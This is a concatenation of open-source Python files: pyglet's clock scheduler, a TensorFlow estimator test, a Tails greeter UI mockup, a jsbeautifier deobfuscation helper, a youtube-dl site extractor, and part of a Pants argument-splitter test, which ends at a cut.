'''Schedule a function to be called every `interval` seconds.
Specifying an interval of 0 prevents the function from being
called again (see `schedule` to call a function as often as possible).
The callback function prototype is the same as for `schedule`.
:Parameters:
`func` : function
The function to call when the timer lapses.
`interval` : float
The number of seconds to wait between each call.
'''
last_ts = self.last_ts or self.next_ts
# Schedule from now, unless now is sufficiently close to last_ts, in
# which case use last_ts. This clusters together scheduled items that
# probably want to be scheduled together. The old (pre 1.1.1)
# behaviour was to always use self.last_ts, and not look at ts. The
# new behaviour is needed because clock ticks can now be quite
# irregular, and span several seconds.
ts = self.time()
if ts - last_ts > 0.2:
last_ts = ts
next_ts = last_ts + interval
self._schedule_item(func, last_ts, next_ts, interval, *args, **kwargs)
def schedule_interval_soft(self, func, interval, *args, **kwargs):
'''Schedule a function to be called every `interval` seconds,
beginning at a time that does not coincide with other scheduled
events.
This method is similar to `schedule_interval`, except that the
        clock will move the interval out of phase with other scheduled
        functions so as to distribute CPU load more evenly over time.
This is useful for functions that need to be called regularly,
but not relative to the initial start time. `pyglet.media`
does this for scheduling audio buffer updates, which need to occur
regularly -- if all audio updates are scheduled at the same time
(for example, mixing several tracks of a music score, or playing
        multiple videos back simultaneously), the load on the CPU spikes
        during those intervals and is idle in between.  Using soft interval
        scheduling, the load is distributed more evenly.
Soft interval scheduling can also be used as an easy way to schedule
graphics animations out of phase; for example, multiple flags
waving in the wind.
:since: pyglet 1.1
:Parameters:
`func` : function
The function to call when the timer lapses.
`interval` : float
The number of seconds to wait between each call.
'''
last_ts = self.last_ts or self.next_ts
# See schedule_interval
ts = self.time()
if ts - last_ts > 0.2:
last_ts = ts
next_ts = self._get_soft_next_ts(last_ts, interval)
last_ts = next_ts - interval
self._schedule_item(func, last_ts, next_ts, interval, *args, **kwargs)
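    # A small sketch of the effect (hypothetical callbacks): two updates
    # requested every 0.5 s end up half a phase apart instead of firing
    # together:
    #
    #   clock.schedule_interval_soft(update_audio_buffer, 0.5)
    #   clock.schedule_interval_soft(update_video_frame, 0.5)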
def _get_soft_next_ts(self, last_ts, interval):
def taken(ts, e):
'''Return True if the given time has already got an item
scheduled nearby.
'''
for item in self._schedule_interval_items:
if item.next_ts is None:
pass
elif abs(item.next_ts - ts) <= e:
return True
elif item.next_ts > ts + e:
return False
return False
# Binary division over interval:
#
# 0 interval
# |--------------------------|
# 5 3 6 2 7 4 8 1 Order of search
#
# i.e., first scheduled at interval,
# then at interval/2
# then at interval/4
# then at interval*3/4
# then at ...
#
# Schedule is hopefully then evenly distributed for any interval,
# and any number of scheduled functions.
next_ts = last_ts + interval
if not taken(next_ts, interval / 4):
return next_ts
dt = interval
divs = 1
while True:
next_ts = last_ts
for i in range(divs - 1):
next_ts += dt
if not taken(next_ts, dt / 4):
return next_ts
dt /= 2
divs *= 2
# Avoid infinite loop in pathological case
if divs > 16:
return next_ts
def schedule_once(self, func, delay, *args, **kwargs):
'''Schedule a function to be called once after `delay` seconds.
The callback function prototype is the same as for `schedule`.
:Parameters:
`func` : function
The function to call when the timer lapses.
`delay` : float
The number of seconds to wait before the timer lapses.
'''
last_ts = self.last_ts or self.next_ts
# See schedule_interval
ts = self.time()
if ts - last_ts > 0.2:
last_ts = ts
next_ts = last_ts + delay
self._schedule_item(func, last_ts, next_ts, 0, *args, **kwargs)
def unschedule(self, func):
'''Remove a function from the schedule.
If the function appears in the schedule more than once, all occurrences
are removed. If the function was not scheduled, no error is raised.
:Parameters:
`func` : function
The function to remove from the schedule.
'''
# First replace zombie items' func with a dummy func that does
# nothing, in case the list has already been cloned inside tick().
# (Fixes issue 326).
for item in self._schedule_items:
if item.func == func:
item.func = _dummy_schedule_func
for item in self._schedule_interval_items:
if item.func == func:
item.func = _dummy_schedule_func
# Now remove matching items from both schedule lists.
self._schedule_items = \
[item for item in self._schedule_items \
if item.func is not _dummy_schedule_func]
self._schedule_interval_items = \
[item for item in self._schedule_interval_items \
if item.func is not _dummy_schedule_func]
# Default clock.
_default = Clock()
def set_default(default):
'''Set the default clock to use for all module-level functions.
By default an instance of `Clock` is used.
:Parameters:
`default` : `Clock`
The default clock to use.
'''
global _default
_default = default
def get_default():
'''Return the `Clock` instance that is used by all module-level
clock functions.
:rtype: `Clock`
:return: The default clock.
'''
return _default
def tick(poll=False):
'''Signify that one frame has passed on the default clock.
This will call any scheduled functions that have elapsed.
:Parameters:
`poll` : bool
If True, the function will call any scheduled functions
but will not sleep or busy-wait for any reason. Recommended
for advanced applications managing their own sleep timers
only.
Since pyglet 1.1.
:rtype: float
:return: The number of seconds since the last "tick", or 0 if this was the
first frame.
'''
return _default.tick(poll)
def get_sleep_time(sleep_idle):
'''Get the time until the next item is scheduled on the default clock.
See `Clock.get_sleep_time` for details.
:Parameters:
`sleep_idle` : bool
If True, the application intends to sleep through its idle
time; otherwise it will continue ticking at the maximum
frame rate allowed.
:rtype: float
:return: Time until the next scheduled event in seconds, or ``None``
if there is no event scheduled.
:since: pyglet 1.1
'''
return _default.get_sleep_time(sleep_idle)
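# A sketch of a custom run loop (hypothetical, not part of pyglet itself)
# showing how tick() and get_sleep_time() cooperate when an application
# manages its own sleeping:
#
#   while running:
#       tick(poll=True)
#       timeout = get_sleep_time(sleep_idle=True)
#       if timeout is not None:
#           time.sleep(timeout)
#       # A timeout of None means nothing is scheduled; a real loop would
#       # block on OS events here instead of spinning.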
def get_fps():
'''Return the current measured FPS of the default clock.
:rtype: float
'''
return _default.get_fps()
def set_fps_limit(fps_limit):
'''Set the framerate limit for the default clock.
:Parameters:
`fps_limit` : float
Maximum frames per second allowed, or None to disable
limiting.
:deprecated: Use `pyglet.app.run` and `schedule_interval` instead.
'''
_default.set_fps_limit(fps_limit)
def get_fps_limit():
'''Get the framerate limit for the default clock.
    :return: The framerate limit previously set by `set_fps_limit`, or 0 if
        no limit was set.
'''
return _default.get_fps_limit()
def schedule(func, *args, **kwargs):
'''Schedule 'func' to be called every frame on the default clock.
The arguments passed to func are ``dt``, followed by any ``*args`` and
``**kwargs`` given here.
:Parameters:
`func` : function
The function to call each frame.
'''
_default.schedule(func, *args, **kwargs)
def schedule_interval(func, interval, *args, **kwargs):
'''Schedule 'func' to be called every 'interval' seconds on the default
clock.
The arguments passed to 'func' are 'dt' (time since last function call),
followed by any ``*args`` and ``**kwargs`` given here.
:Parameters:
`func` : function
The function to call when the timer lapses.
`interval` : float
The number of seconds to wait between each call.
'''
_default.schedule_interval(func, interval, *args, **kwargs)
def schedule_interval_soft(func, interval, *args, **kwargs):
'''Schedule 'func' to be called every 'interval' seconds on the default
clock, beginning at a time that does not coincide with other scheduled
events.
The arguments passed to 'func' are 'dt' (time since last function call),
followed by any ``*args`` and ``**kwargs`` given here.
:see: `Clock.schedule_interval_soft`
:since: pyglet 1.1
:Parameters:
`func` : function
The function to call when the timer lapses.
`interval` : float
The number of seconds to wait between each call.
'''
_default.schedule_interval_soft(func, interval, *args, **kwargs)
def schedule_once(func, delay, *args, **kwargs):
'''Schedule 'func' to be called once after 'delay' seconds (can be
a float) on the default clock. The arguments passed to 'func' are
'dt' (time since last function call), followed by any ``*args`` and
``**kwargs`` given here.
If no default clock is set, the func is queued and will be scheduled
on the default clock as soon as it is created.
:Parameters:
`func` : function
The function to call when the timer lapses.
`delay` : float
The number of seconds to wait before the timer lapses.
'''
_default.schedule_once(func, delay, *args, **kwargs)
def unschedule(func):
'''Remove 'func' from the default clock's schedule. No error
is raised if the func was never scheduled.
:Parameters:
`func` : function
The function to remove from the schedule.
'''
_default.unschedule(func)
class ClockDisplay(object):
'''Display current clock values, such as FPS.
This is a convenience class for displaying diagnostics such as the
framerate. See the module documentation for example usage.
:Ivariables:
`label` : `pyglet.font.Text`
The label which is displayed.
:deprecated: This class presents values that are often misleading, as
they reflect the rate of clock ticks, not displayed framerate. Use
pyglet.window.FPSDisplay instead.
'''
def __init__(self,
font=None,
interval=0.25,
format='%(fps).2f',
color=(.5, .5, .5, .5),
clock=None):
'''Create a ClockDisplay.
All parameters are optional. By default, a large translucent
font will be used to display the FPS to two decimal places.
:Parameters:
`font` : `pyglet.font.Font`
The font to format text in.
`interval` : float
The number of seconds between updating the display.
`format` : str
A format string describing the format of the text. This
string is modulated with the dict ``{'fps' : fps}``.
`color` : 4-tuple of float
The color, including alpha, passed to ``glColor4f``.
`clock` : `Clock`
The clock which determines the time. If None, the default
clock is used.
'''
if clock is None:
clock = _default
self.clock = clock
self.clock.schedule_interval(self.update_text, interval)
if not font:
from pyglet.font import load as load_font
font = load_font('', 36, bold=True)
import pyglet.font
self.label = pyglet.font.Text(font, '', color=color, x=10, y=10)
self.format = format
def unschedule(self):
'''Remove the display from its clock's schedule.
`ClockDisplay` uses `Clock.schedule_interval` to periodically update
its display label. Even if the ClockDisplay is not being used any
more, its update method will still be scheduled, which can be a
resource drain. Call this method to unschedule the update method
and allow the ClockDisplay to be garbage collected.
:since: pyglet 1.1
'''
self.clock.unschedule(self.update_text)
def update_text(self, dt=0):
'''Scheduled method to update the label text.'''
fps = self.clock.get_fps()
self.label.text = self.format % {'fps': fps}
def draw(self):
'''Method called each frame to render the label.'''
self.label.draw()
def test_clock():
import getopt
import sys
test_seconds = 1
test_fps = 60
show_fps = False
options, args = getopt.getopt(sys.argv[1:], 'vht:f:',
['time=', 'fps=', 'help'])
for key, value in options:
if key in ('-t', '--time'):
test_seconds = float(value)
elif key in ('-f', '--fps'):
test_fps = float(value)
        elif key in ('-v',):
show_fps = True
elif key in ('-h', '--help'):
print ('Usage: clock.py <options>\n'
'\n'
'Options:\n'
' -t --time Number of seconds to run for.\n'
' -f --fps Target FPS.\n'
'\n'
'Tests the clock module by measuring how close we can\n'
'get to the desired FPS by sleeping and busy-waiting.')
sys.exit(0)
set_fps_limit(test_fps)
start = time.time()
# Add one because first frame has no update interval.
n_frames = int(test_seconds * test_fps + 1)
print 'Testing %f FPS for %f seconds...' % (test_fps, test_seconds)
for i in xrange(n_frames):
tick()
if show_fps:
print get_fps()
total_time = time.time() - start
total_error = total_time - test_seconds
print 'Total clock error: %f secs' % total_error
print 'Total clock error / secs: %f secs/secs' % \
(total_error / test_seconds)
# Not fair to add the extra frame in this calc, since no-one's interested
# in the startup situation.
print 'Average FPS: %f' % ((n_frames - 1) / total_time)
if __name__ == '__main__':
test_clock()
| bsd-3-clause |
maciekcc/tensorflow | tensorflow/contrib/learn/python/learn/estimators/estimators_test.py | 23 | 5276 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Custom optimizer tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import numpy as np
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.learn.python import learn
from tensorflow.contrib.learn.python.learn import datasets
from tensorflow.contrib.learn.python.learn import metric_spec
from tensorflow.contrib.learn.python.learn.estimators import estimator as estimator_lib
from tensorflow.contrib.learn.python.learn.estimators._sklearn import accuracy_score
from tensorflow.contrib.learn.python.learn.estimators._sklearn import train_test_split
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.training import momentum as momentum_lib
class FeatureEngineeringFunctionTest(test.TestCase):
"""Tests feature_engineering_fn."""
def testFeatureEngineeringFn(self):
def input_fn():
return {
"x": constant_op.constant([1.])
}, {
"y": constant_op.constant([11.])
}
def feature_engineering_fn(features, labels):
_, _ = features, labels
return {
"transformed_x": constant_op.constant([9.])
}, {
"transformed_y": constant_op.constant([99.])
}
def model_fn(features, labels):
# dummy variable:
_ = variables_lib.Variable([0.])
_ = labels
predictions = features["transformed_x"]
loss = constant_op.constant([2.])
update_global_step = variables.get_global_step().assign_add(1)
return predictions, loss, update_global_step
estimator = estimator_lib.Estimator(
model_fn=model_fn, feature_engineering_fn=feature_engineering_fn)
estimator.fit(input_fn=input_fn, steps=1)
prediction = next(estimator.predict(input_fn=input_fn, as_iterable=True))
# predictions = transformed_x (9)
self.assertEqual(9., prediction)
metrics = estimator.evaluate(
input_fn=input_fn, steps=1,
metrics={"label":
metric_spec.MetricSpec(lambda predictions, labels: labels)})
# labels = transformed_y (99)
self.assertEqual(99., metrics["label"])
def testNoneFeatureEngineeringFn(self):
def input_fn():
return {
"x": constant_op.constant([1.])
}, {
"y": constant_op.constant([11.])
}
def feature_engineering_fn(features, labels):
_, _ = features, labels
return {
"x": constant_op.constant([9.])
}, {
"y": constant_op.constant([99.])
}
def model_fn(features, labels):
# dummy variable:
_ = variables_lib.Variable([0.])
_ = labels
predictions = features["x"]
loss = constant_op.constant([2.])
update_global_step = variables.get_global_step().assign_add(1)
return predictions, loss, update_global_step
estimator_with_fe_fn = estimator_lib.Estimator(
model_fn=model_fn, feature_engineering_fn=feature_engineering_fn)
estimator_with_fe_fn.fit(input_fn=input_fn, steps=1)
estimator_without_fe_fn = estimator_lib.Estimator(model_fn=model_fn)
estimator_without_fe_fn.fit(input_fn=input_fn, steps=1)
# predictions = x
prediction_with_fe_fn = next(
estimator_with_fe_fn.predict(
input_fn=input_fn, as_iterable=True))
self.assertEqual(9., prediction_with_fe_fn)
prediction_without_fe_fn = next(
estimator_without_fe_fn.predict(
input_fn=input_fn, as_iterable=True))
self.assertEqual(1., prediction_without_fe_fn)
class CustomOptimizer(test.TestCase):
"""Custom optimizer tests."""
def testIrisMomentum(self):
random.seed(42)
iris = datasets.load_iris()
x_train, x_test, y_train, y_test = train_test_split(
iris.data, iris.target, test_size=0.2, random_state=42)
def custom_optimizer():
return momentum_lib.MomentumOptimizer(learning_rate=0.01, momentum=0.9)
classifier = learn.DNNClassifier(
hidden_units=[10, 20, 10],
feature_columns=learn.infer_real_valued_columns_from_input(x_train),
n_classes=3,
optimizer=custom_optimizer,
config=learn.RunConfig(tf_random_seed=1))
classifier.fit(x_train, y_train, steps=400)
predictions = np.array(list(classifier.predict_classes(x_test)))
score = accuracy_score(y_test, predictions)
self.assertGreater(score, 0.65, "Failed with score = {0}".format(score))
if __name__ == "__main__":
test.main()
| apache-2.0 |
austin987/tails | wiki/src/blueprint/greeter_revamp_UI/mockups/mockup.py | 14 | 7062 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import optparse
from gi.repository import Gtk, Gdk, GObject, GdkPixbuf
class GreeterMockup:
def __init__(self, version="5", persistence=False):
uifilename = "tails-greeter" + version + ".ui"
ui = Gtk.Builder()
ui.add_from_file(uifilename)
ui.connect_signals(self)
self._main_window = ui.get_object("window_main")
self._notebook = ui.get_object("notebook_main")
self._previous = ui.get_object("button_previous")
self._locale_label = ui.get_object("label_locale")
self._linkbutton_language = ui.get_object("linkbutton_language")
self._persistence = ui.get_object("box_persistence")
self._persistence_setup = ui.get_object("button_persistence_setup")
self._persistence_entry = ui.get_object("box_persistence_entry")
self._persistence_activate = ui.get_object("box_persistence_activate")
self._persistence_info = ui.get_object("box_persistence_info")
self._iconview_locale = ui.get_object("iconview_locale")
self._iconview_options = ui.get_object("iconview_options")
language = ui.get_object("languages_treeview")
self._persistence.set_visible(persistence)
if language:
tvcolumn = Gtk.TreeViewColumn("Language")
language.append_column(tvcolumn)
cell = Gtk.CellRendererText()
tvcolumn.pack_start(cell, True)
tvcolumn.add_attribute(cell, 'text', 1)
self.cb_languages()
self._iconview_locale.connect("selection-changed", self.cb_option_selected)
self.fill_view(self._iconview_options,
[("Keyboard", "preferences-desktop-keyboard", "cb_show_keyboard"),
("Bridges", "network-vpn", "cb_show_briges"),
("Widows camouflage", "preferences-desktop-theme", "cb_show_camouflage"),
("Administrative rights", "dialog-password", "cb_show_password"),
("Hardware address", "audio-card", "cb_show_mac")])
self._iconview_options.connect("selection-changed", self.cb_option_selected)
self._main_window.show()
def fill_view(self, view, list):
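        # Each model row is (display label, icon pixbuf, name of the
        # callback method that cb_option_selected dispatches to).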
model = Gtk.ListStore(GObject.TYPE_STRING, GdkPixbuf.Pixbuf, GObject.TYPE_STRING)
icon_theme = Gtk.IconTheme.get_default()
for i in list:
try:
pixbuf = icon_theme.lookup_icon(i[1], 48, 0).load_icon()
except:
pixbuf = None
model.append([i[0], pixbuf, i[2]])
view.set_model(model)
view.set_text_column(0)
view.set_pixbuf_column(1)
def cb_languages(self, widget=None, data=None):
self.fill_view(self._iconview_locale,
[("Deutsch", None, "cb_locale"),
("English", None, "cb_locale"),
("Español", None, "cb_locale"),
("Français", None, "cb_locale"),
("Italiano", None, "cb_locale"),
("Portugès", None, "cb_locale"),
("Tiéng Vièt", None, "cb_locale"),
("Русский", None, "cb_locale"),
("العربية", None, "cb_locale"),
("فارسی", None, "cb_locale"),
("中文", None, "cb_locale"),
("Other...", None, "cb_more_languages")])
self._locale_label.set_text("please select your language")
if self._linkbutton_language:
self._linkbutton_language.set_visible(False)
def cb_option_selected(self, iconview, data=None):
        selected = iconview.get_selected_items()
        if not selected:
            # "selection-changed" also fires when the selection is cleared.
            return
        model = iconview.get_model()
        method_name = model[selected[0]][2]
        if method_name:
            print(method_name)
            # Dispatch to the handler method named in the model row.
            getattr(self, method_name)()
def cb_more_languages(self):
self._notebook.set_current_page(1)
self._previous.set_visible(True)
def cb_locale(self):
self.fill_view(self._iconview_locale,
[("Belgique", None, "cb_keyboard"),
("Canada", None, "cb_keyboard"),
("France", None, "cb_keyboard"),
("Luxembouge", None, "cb_keyboard"),
("Suisse", None, "cb_keyboard"),
("Other...", None, "cb_more_languages")])
self._locale_label.set_text("you have chosen French language; please select your region")
if self._linkbutton_language:
self._linkbutton_language.set_visible(True)
def cb_keyboard(self):
pass
def cb_show_briges(self):
pass
def cb_show_keyboard(self):
self._notebook.set_current_page(1)
self._previous.set_visible(True)
def cb_show_locale(self):
self._notebook.set_current_page(1)
self._previous.set_visible(True)
def cb_show_main(self, widget, data=None):
self._notebook.set_current_page(0)
self._previous.set_visible(False)
def cb_show_camouflage(self):
self._notebook.set_current_page(3)
self._previous.set_visible(True)
def cb_show_password(self):
self._notebook.set_current_page(2)
self._previous.set_visible(True)
def cb_show_mac(self):
self._notebook.set_current_page(3)
self._previous.set_visible(True)
def cb_setup_persistence(self, widget, data=None):
if self._persistence_setup:
self._persistence_setup.set_visible(False)
self._persistence_entry.set_visible(True)
self._persistence_activate.set_visible(True)
def cb_activate_persistence(self, widget, data=None):
if self._persistence_activate:
self._persistence_entry.set_visible(False)
self._persistence_activate.set_visible(False)
self._persistence_info.set_visible(True)
def cb_cancel_persistence(self, widget, data=None):
if self._persistence_setup:
self._persistence_entry.set_visible(False)
self._persistence_activate.set_visible(False)
self._persistence_setup.set_visible(True)
def cb_quit(self, widget, data=None):
Gtk.main_quit()
def cb_lang_button_press(self, widget, event, data=None):
"""Handle mouse click in langdialog"""
if (event.type == Gdk.EventType._2BUTTON_PRESS or
event.type == Gdk.EventType._3BUTTON_PRESS):
self._notebook.set_current_page(0)
self._previous.set_visible(False)
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option("-v", "--variant", dest="variant", default="5")
parser.add_option("-p", "--persistence", action="store_true", dest="persistence", default=False)
parser.add_option("-P", "--no-persistence", action="store_false", dest="persistence", default=False)
(options, args) = parser.parse_args()
app = GreeterMockup(options.variant, options.persistence)
Gtk.main()
| gpl-3.0 |
repotvsupertuga/tvsupertuga.repository | script.premium.TVsupertuga/resources/lib/external/jsbeautifier/unpackers/javascriptobfuscator.py | 220 | 1790 | #
# simple unpacker/deobfuscator for scripts messed up with
# javascriptobfuscator.com
#
# written by Einar Lielmanis <[email protected]>
# rewritten in Python by Stefano Sanfilippo <[email protected]>
#
# Will always return valid javascript: if `detect()` is false, `code` is
# returned, unmodified.
#
# usage:
#
# if javascriptobfuscator.detect(some_string):
# some_string = javascriptobfuscator.unpack(some_string)
#
"""deobfuscator for scripts messed up with JavascriptObfuscator.com"""
import re
PRIORITY = 1
def smartsplit(code):
"""Split `code` at " symbol, only if it is not escaped."""
strings = []
pos = 0
while pos < len(code):
if code[pos] == '"':
word = '' # new word
pos += 1
while pos < len(code):
if code[pos] == '"':
break
if code[pos] == '\\':
word += '\\'
pos += 1
word += code[pos]
pos += 1
strings.append('"%s"' % word)
pos += 1
return strings
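# For example (a sketch; not taken from real obfuscator output), escaped
# quotes stay inside a single element:
#
#   smartsplit(r'"foo", "ba\"r"')  ->  ['"foo"', '"ba\\"r"']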
def detect(code):
"""Detects if `code` is JavascriptObfuscator.com packed."""
# prefer `is not` idiom, so that a true boolean is returned
return (re.search(r'^var _0x[a-f0-9]+ ?\= ?\[', code) is not None)
def unpack(code):
"""Unpacks JavascriptObfuscator.com packed code."""
if detect(code):
matches = re.search(r'var (_0x[a-f\d]+) ?\= ?\[(.*?)\];', code)
if matches:
variable = matches.group(1)
dictionary = smartsplit(matches.group(2))
code = code[len(matches.group(0)):]
for key, value in enumerate(dictionary):
code = code.replace(r'%s[%s]' % (variable, key), value)
return code
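# A small round-trip sketch (hypothetical obfuscated input, not taken from
# real JavascriptObfuscator.com output):
#
#   packed = 'var _0xab12 = ["alert", "hi"]; window[_0xab12[0]](_0xab12[1]);'
#   detect(packed)  # -> True
#   unpack(packed)  # -> ' window["alert"]("hi");'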
| gpl-2.0 |
atomic83/youtube-dl | youtube_dl/extractor/worldstarhiphop.py | 114 | 2323 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
class WorldStarHipHopIE(InfoExtractor):
_VALID_URL = r'https?://(?:www|m)\.worldstar(?:candy|hiphop)\.com/(?:videos|android)/video\.php\?v=(?P<id>.*)'
_TESTS = [{
"url": "http://www.worldstarhiphop.com/videos/video.php?v=wshh6a7q1ny0G34ZwuIO",
"md5": "9d04de741161603bf7071bbf4e883186",
"info_dict": {
"id": "wshh6a7q1ny0G34ZwuIO",
"ext": "mp4",
"title": "KO Of The Week: MMA Fighter Gets Knocked Out By Swift Head Kick!"
}
}, {
'url': 'http://m.worldstarhiphop.com/android/video.php?v=wshh6a7q1ny0G34ZwuIO',
'md5': 'dc1c76c83ecc4190bb1eb143899b87d3',
'info_dict': {
'id': 'wshh6a7q1ny0G34ZwuIO',
'ext': 'mp4',
"title": "KO Of The Week: MMA Fighter Gets Knocked Out By Swift Head Kick!"
}
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
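        # Some pages embed a Vevo player instead of hosting the video
        # directly; hand those off to the Vevo extractor.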
m_vevo_id = re.search(r'videoId=(.*?)&?', webpage)
if m_vevo_id is not None:
return self.url_result('vevo:%s' % m_vevo_id.group(1), ie='Vevo')
video_url = self._search_regex(
[r'so\.addVariable\("file","(.*?)"\)',
r'<div class="artlist">\s*<a[^>]+href="([^"]+)">'],
webpage, 'video URL')
if 'youtube' in video_url:
return self.url_result(video_url, ie='Youtube')
video_title = self._html_search_regex(
[r'(?s)<div class="content-heading">\s*<h1>(.*?)</h1>',
r'<span[^>]+class="tc-sp-pinned-title">(.*)</span>'],
webpage, 'title')
        # Get the thumbnail; if there is none, extract the correct title
        # for WSHH candy videos instead.
thumbnail = self._html_search_regex(
r'rel="image_src" href="(.*)" />', webpage, 'thumbnail',
default=None)
if not thumbnail:
_title = r'candytitles.*>(.*)</span>'
mobj = re.search(_title, webpage)
if mobj is not None:
video_title = mobj.group(1)
return {
'id': video_id,
'url': video_url,
'title': video_title,
'thumbnail': thumbnail,
}
| unlicense |
kwlzn/pants | tests/python/pants_test/option/test_arg_splitter.py | 19 | 11254 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import shlex
import unittest
from pants.option.arg_splitter import (ArgSplitter, NoGoalHelp, OptionsHelp, UnknownGoalHelp,
VersionHelp)
from pants.option.scope import ScopeInfo
def task(scope):
return ScopeInfo(scope, ScopeInfo.TASK)
def intermediate(scope):
return ScopeInfo(scope, ScopeInfo.INTERMEDIATE)
def subsys(scope):
return ScopeInfo(scope, ScopeInfo.SUBSYSTEM)
class ArgSplitterTest(unittest.TestCase):
_known_scope_infos = [intermediate('compile'), task('compile.java'), task('compile.scala'),
subsys('jvm'), subsys('jvm.test.junit'),
subsys('reporting'), intermediate('test'), task('test.junit')]
def _split(self, args_str, expected_goals, expected_scope_to_flags, expected_target_specs,
expected_passthru=None, expected_passthru_owner=None,
expected_is_help=False, expected_help_advanced=False, expected_help_all=False):
expected_passthru = expected_passthru or []
splitter = ArgSplitter(ArgSplitterTest._known_scope_infos)
args = shlex.split(args_str)
goals, scope_to_flags, target_specs, passthru, passthru_owner = splitter.split_args(args)
self.assertEquals(expected_goals, goals)
self.assertEquals(expected_scope_to_flags, scope_to_flags)
self.assertEquals(expected_target_specs, target_specs)
self.assertEquals(expected_passthru, passthru)
self.assertEquals(expected_passthru_owner, passthru_owner)
self.assertEquals(expected_is_help, splitter.help_request is not None)
self.assertEquals(expected_help_advanced,
(isinstance(splitter.help_request, OptionsHelp) and
splitter.help_request.advanced))
self.assertEquals(expected_help_all,
(isinstance(splitter.help_request, OptionsHelp) and
splitter.help_request.all_scopes))
def _split_help(self, args_str, expected_goals, expected_scope_to_flags, expected_target_specs,
expected_help_advanced=False, expected_help_all=False):
self._split(args_str, expected_goals, expected_scope_to_flags, expected_target_specs,
expected_passthru=None, expected_passthru_owner=None,
expected_is_help=True,
expected_help_advanced=expected_help_advanced,
expected_help_all=expected_help_all)
def _split_version_request(self, args_str):
splitter = ArgSplitter(ArgSplitterTest._known_scope_infos)
splitter.split_args(shlex.split(args_str))
self.assertTrue(isinstance(splitter.help_request, VersionHelp))
def _split_unknown_goal(self, args_str, unknown_goals):
splitter = ArgSplitter(ArgSplitterTest._known_scope_infos)
splitter.split_args(shlex.split(args_str))
self.assertTrue(isinstance(splitter.help_request, UnknownGoalHelp))
self.assertSetEqual(set(unknown_goals), set(splitter.help_request.unknown_goals))
def _split_no_goal(self, args_str):
splitter = ArgSplitter(ArgSplitterTest._known_scope_infos)
splitter.split_args(shlex.split(args_str))
self.assertTrue(isinstance(splitter.help_request, NoGoalHelp))
def test_basic_arg_splitting(self):
# Various flag combos.
self._split('./pants --compile-java-long-flag -f compile -g compile.java -x test.junit -i '
'src/java/org/pantsbuild/foo src/java/org/pantsbuild/bar:baz',
['compile', 'test'],
{
'': ['-f'],
'compile.java': ['--long-flag', '-x'],
'compile': ['-g'],
'test.junit': ['-i']
},
['src/java/org/pantsbuild/foo', 'src/java/org/pantsbuild/bar:baz'])
self._split('./pants -farg --fff=arg compile --gg-gg=arg-arg -g test.junit --iii '
'--compile-java-long-flag src/java/org/pantsbuild/foo src/java/org/pantsbuild/bar:baz',
['compile', 'test'],
{
'': ['-farg', '--fff=arg'],
'compile': ['--gg-gg=arg-arg', '-g'],
'test.junit': ['--iii'],
'compile.java': ['--long-flag'],
},
['src/java/org/pantsbuild/foo', 'src/java/org/pantsbuild/bar:baz'])
def test_distinguish_goals_from_target_specs(self):
self._split('./pants compile test foo::', ['compile', 'test'],
{'': [], 'compile': [], 'test': []}, ['foo::'])
self._split('./pants compile test foo::', ['compile', 'test'],
{'': [], 'compile': [], 'test': []}, ['foo::'])
self._split('./pants compile test:test', ['compile'], {'': [], 'compile': []}, ['test:test'])
self._split('./pants test test:test', ['test'], {'': [], 'test': []}, ['test:test'])
self._split('./pants test ./test', ['test'], {'': [], 'test': []}, ['./test'])
self._split('./pants test //test', ['test'], {'': [], 'test': []}, ['//test'])
def test_descoping_qualified_flags(self):
self._split('./pants compile test --compile-java-bar --no-test-junit-baz foo/bar',
['compile', 'test'],
{'': [], 'compile': [], 'compile.java': ['--bar'], 'test': [],
'test.junit': ['--no-baz']}, ['foo/bar'])
# Qualified flags don't count as explicit goals.
self._split('./pants compile --test-junit-bar foo/bar',
['compile'],
{'': [], 'compile': [], 'test.junit': ['--bar']}, ['foo/bar'])
def test_passthru_args(self):
self._split('./pants test foo/bar -- -t arg',
['test'],
{'': [], 'test': []},
['foo/bar'],
expected_passthru=['-t', 'arg'],
expected_passthru_owner='test')
self._split('./pants -farg --fff=arg compile --gg-gg=arg-arg -g test.junit --iii '
'--compile-java-long-flag src/java/org/pantsbuild/foo '
'src/java/org/pantsbuild/bar:baz '
'-- passthru1 passthru2',
['compile', 'test'],
{
'': ['-farg', '--fff=arg'],
'compile': ['--gg-gg=arg-arg', '-g'],
'compile.java': ['--long-flag'],
'test.junit': ['--iii']
},
['src/java/org/pantsbuild/foo', 'src/java/org/pantsbuild/bar:baz'],
expected_passthru=['passthru1', 'passthru2'],
expected_passthru_owner='test.junit')
def test_subsystem_flags(self):
# Global subsystem flag in global scope.
self._split('./pants --jvm-options=-Dbar=baz test foo:bar',
['test'],
{'': [], 'jvm': ['--options=-Dbar=baz'], 'test': []}, ['foo:bar'])
# Qualified task subsystem flag in global scope.
self._split('./pants --jvm-test-junit-options=-Dbar=baz test foo:bar',
['test'],
{'': [], 'jvm.test.junit': ['--options=-Dbar=baz'], 'test': []}, ['foo:bar'])
# Unqualified task subsystem flag in task scope.
# Note that this exposes a small problem: You can't set an option on the cmd-line if that
# option's name begins with any subsystem scope. For example, if test.junit has some option
# named --jvm-foo, then it cannot be set on the cmd-line, because the ArgSplitter will assume
# it's an option --foo on the jvm subsystem.
self._split('./pants test.junit --jvm-options=-Dbar=baz foo:bar',
['test'],
{'': [], 'jvm.test.junit': ['--options=-Dbar=baz'], 'test.junit': []}, ['foo:bar'])
# Global-only flag in task scope.
